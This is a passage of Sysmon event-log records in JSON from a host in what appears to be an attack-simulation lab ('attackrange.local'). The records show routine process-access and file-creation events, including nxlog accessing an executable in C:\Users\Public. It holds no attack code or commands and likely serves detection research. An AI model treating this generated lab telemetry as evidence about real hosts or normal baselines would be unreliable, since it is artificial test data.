{"EventTime":"2020-08-01 07:02:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8415,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:11.935\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:11.935","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8416,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:12.951\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:12.951","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8417,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:13.638\r\nProcessGuid: {E2A3D6B1-1373-5F25-0000-001071F90E00}\r\nProcessId: 4780\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12ac-0\\System.IdentityModel.dll\r\nCreationUtcTime: 2020-08-01 07:02:13.638","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:13.638","ProcessGuid":"{E2A3D6B1-1373-5F25-0000-001071F90E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12ac-0\\System.IdentityModel.dll","CreationUtcTime":"2020-08-01 07:02:13.638","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8418,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:13.716\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1375-5F25-0000-00100A020F00}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:13.716","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1375-5F25-0000-00100A020F00}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8419,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:13.716\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1375-5F25-0000-00100A020F00}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:13.716","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1375-5F25-0000-00100A020F00}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8420,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:13.716\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1375-5F25-0000-00100A020F00}\r\nTargetProcessId: 1480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:13.716","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1375-5F25-0000-00100A020F00}","TargetProcessId":"1480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8421,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:13.763\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010E00A0D00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:13.763","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010E00A0D00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8422,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:13.763\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010E00A0D00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:13.763","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010E00A0D00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8423,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:13.779\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1375-5F25-0000-001091050F00}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 